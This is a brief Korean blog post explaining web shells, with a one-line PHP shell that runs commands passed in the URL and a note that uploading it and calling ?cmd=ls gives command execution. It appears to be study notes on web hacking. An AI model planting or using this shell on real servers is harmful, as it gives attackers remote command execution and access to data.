참고자료
http://darksoulstory.tistory.com/324
http://code1018.tistory.com/96?category=939350
http://code1018.tistory.com/94?category=939350
웹쉘은 공격자가 원격에서 웹서버에 명령을 수행할 수 있ㄷ록 작성한 웹스크립츠(asp,php,jsp,cgi) 파일이다.
이때 zip, jpg, doc와 같은 데이터 파일종류 이외에 악의적으로 제작된 스크립트 파일인웹쉘을 업로드하여 웹 서버를 해킹하는 사고가 빈번하고 있다.
이와 같이 서버 명령을 실행할 수 있는 웹 쉘을 이용하여 웹서버에 명령을 실행해 관리자 권한을 획득한 후 웹 페이지 소스코드 열람, 서버내 자료 유출, 백도어 프로그램 설치 등의 다양한 공격이 가능하다.
<?php
system($_GET[cmd]);
?>
이런 파일을 업로드 하고
?cmd=ls를 URL로 주면 공격 가능!
'웹 해킹 > 웹 해킹 개념' 카테고리의 다른 글
| 프락시 툴을 이용한 HTTP 분석 (0) | 2018.03.19 |
|---|---|
| Union SQL Injection (0) | 2018.03.05 |
| HEADER INJECTION (0) | 2018.02.12 |
| XSS 연습 (0) | 2018.02.10 |
| XSS 크로스 사이트 스크립팅 (0) | 2018.02.10 |